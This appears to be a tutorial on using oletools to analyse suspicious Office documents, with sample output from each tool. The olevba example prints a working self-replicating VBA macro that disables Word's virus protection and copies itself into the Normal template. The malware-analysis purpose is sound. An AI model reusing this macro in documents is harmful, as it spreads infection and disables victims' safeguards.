Information security | analysis of malicious document samples using oletools Python

preface

After learning oletools python, you can perform basic analysis on malicious document samples.

What is oletools Python

Oletools Python tool is used to analyze MS OLE2 files (structured storage, composite file binary format) and MS Office documents for malware analysis, forensics and debugging.

Download and install

  • Linux,Mac: sudo -H pip install -U oletools
  • Windows: pip install -U oletools

Official website link: https://pypi.org/project/oletools/

Tool module

Tools for Analyzing Malicious sample files

oleid: analysis OLE File to detect specific features commonly found in malicious files.
olevba: from MS Office Documentation( OLE and OpenXML)Extraction and analysis in VBA Macro Source code.
MacroRaptor: Detect malicious VBA macro
msodde: Detect and from MS Office file, RTF and CSV Extract from DDE / DDEAUTO link
pyxswf: Detection, extraction and analysis may be embedded in MS Office Document (e.g Word,Excel)and RTF Etc Flash Object( SWF),This is particularly useful for malware analysis.
oleobj: from OLE Extract embedded objects from the file.
rtfobj: from RTF Extract embedded objects from the file.

Tools for analyzing OLE file structure

olebrowse: A simple GUI,Browsable OLE File (e.g MS Word,Excel,Powerpoint Document) to view and extract a single data stream.
olemeta: from OLE Extract all standard attributes (metadata) from the file.
oletimes: Extract the creation and modification timestamps of all streams and stores.
oledir: display OLE All directory entries for the file, including free and orphaned entries.
olemap: display OLE Mapping of all sectors in the file.

Application examples

  • Determine whether the sample contains suspicious macros (macro viruses)
python mraptor.py file.docx

Output content:

MacroRaptor 0.51 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File
----------+-----+----+--------------------------------------------------------
Macro OK  |---  |TXT |log.docx

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 2 - Macro OK

mraptor detects most malicious VBA macros through heuristic methods, which is different from anti-virus engine detection signature. When a document is found to automatically execute triggers and write to the file system or memory, or execute VBA context, it will be judged as a malicious macro.

  • Get the creation and modification time of all streams and stores in the sample
python oletimes.py file.doc

Output content:

FILE: file.doc

+----------------------------+---------------------+---------------+
| Stream/Storage name        | Modification Time   | Creation Time |
+----------------------------+---------------------+---------------+
| Root                       | 2017-01-04 02:04:53 | None          |
| '\x01CompObj'              | None                | None          |
| '\x05DocumentSummaryInform | None                | None          |
| ation'                     |                     |               |
| '\x05SummaryInformation'   | None                | None          |
| '1Table'                   | None                | None          |
| 'Data'                     | None                | None          |
| 'WordDocument'             | None                | None          |
+----------------------------+---------------------+---------------+

Obtaining the time information of files through ole times can help us sort out the creation order and association relationship of files in the process of processing a large number of document samples.

  • View the basic information of flow structure in the document
python oledir.py file.doc

Output content:

OLE directory entries in file file.doc:
----+------+-------+----------------------+-----+-----+-----+--------+------
id  |Status|Type   |Name                  |Left |Right|Child|1st Sect|Size
----+------+-------+----------------------+-----+-----+-----+--------+------
0   |<Used>|Root   |Root Entry            |-    |-    |3    |68      |128
1   |<Used>|Stream |Data                  |-    |-    |-    |15      |4096
2   |<Used>|Stream |1Table                |1    |6    |-    |1D      |27856
3   |<Used>|Stream |WordDocument          |2    |5    |-    |0       |10290
4   |<Used>|Stream |\x05SummaryInformation|-    |-    |-    |54      |4096
5   |<Used>|Stream |\x05DocumentSummaryInf|4    |-    |-    |5C      |4096
    |      |       |ormation              |     |     |     |        |
6   |<Used>|Stream |\x01CompObj           |-    |-    |-    |0       |110
7   |unused|Empty  |                      |-    |-    |-    |0       |0
  • View the mapping of all OLE sectors in the document
python olemeta.py file.doc

Output content:

FILE: file.doc

Properties from the SummaryInformation stream:
+---------------------+------------------------------+
|Property             |Value                         |
+---------------------+------------------------------+
|codepage             |936                           |
|title                |                              |
|subject              |                              |
|author               |TIPDM                         |
|keywords             |                              |
|template             |Normal.dotm                   |
|last_saved_by        |User                          |
|revision_number      |6                             |
|total_edit_time      |1740                          |
|last_printed         |2016-06-27 05:49:00           |
|create_time          |2016-07-27 23:49:00           |
|last_saved_time      |2017-01-04 02:04:00           |
|num_pages            |1                             |
|num_words            |87                            |
|num_chars            |498                           |
|creating_application |Microsoft Office Word         |
|security             |0                             |
+---------------------+------------------------------+

Properties from the DocumentSummaryInformation stream:
+---------------------+------------------------------+
|Property             |Value                         |
+---------------------+------------------------------+
|codepage_doc         |936                           |
|lines                |4                             |
|paragraphs           |1                             |
|scale_crop           |False                         |
|company              |                              |
|links_dirty          |False                         |
|chars_with_spaces    |584                           |
|shared_doc           |False                         |
|hlinks_changed       |False                         |
|version              |917504                        |
+---------------------+------------------------------
  • Extract the macro code of the document
python olevba.py file.doc

Output content:

Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MAS--B-- file.doc
===============================================================================
FILE: file.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: file.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'APMP
'KILL
Private Sub Document_Open()
   On Error Resume Next
   Application.DisplayStatusBar = False
   Options.VirusProtection = False
   Options.SaveNormalPrompt = False
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
          .DeleteLines 1, .CountOfLines
          .InsertLines 1, MyCode
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName
       End If
   End With
End Sub

+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| AutoExec   | Document_Open  | Runs when the Word or Publisher         |
|            |                | document is opened                      |
| Suspicious | KILL           | May delete a file                       |
| Suspicious | VBProject      | May attempt to modify the VBA code      |
|            |                | (self-modification)                     |
| Suspicious | VBComponents   | May attempt to modify the VBA code      |
|            |                | (self-modification)                     |
| Suspicious | CodeModule     | May attempt to modify the VBA code      |
|            |                | (self-modification)                     |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+

olvba is a tool for parsing OLE and OpenXML files. It can detect whether VBA macros are suspicious by extracting source code, keywords used by anti sandbox and anti virtualization technology and potential IOC (IP address, URL, executable file name, etc.). It can also detect and decode several common confusion methods, including hexadecimal, inverted string, base64, dridex, VBA expression, and extract IOC from the decoded string.

  • Detect specific characteristics of documents
python oleid.py file.doc

Output content:

Filename: file.doc
+-------------------------------+-----------------------+
| Indicator                     | Value                 |
+-------------------------------+-----------------------+
| OLE format                    | True                  |
| Has SummaryInformation stream | True                  |
| Application name              | Microsoft Office Word |
| Encrypted                     | False                 |
| Word Document                 | True                  |
| VBA Macros                    | False                 |
| Excel Workbook                | False                 |
| PowerPoint Presentation       | False                 |
| Visio Drawing                 | False                 |
| ObjectPool                    | False                 |
| Flash objects                 | 0                     |
+-------------------------------+-----------------------+

OLE file types (such as MS Word, Excel, PowerPoint, etc.), VBA macros, embedded Flash objects, embedded macro objects, and MS Office encryption of malicious documents are detected through oleid.

summary

If you encounter suspicious document samples next time (such as document attachments in anonymous emails, group documents uploaded in QQ communication groups, resource documents shared by online disks, etc.), you can try to use the above methods for basic detection and analysis.

Keywords: Python Windows Cyber Security Information Security

Added by shaymol on Sun, 02 Jan 2022 20:50:42 +0200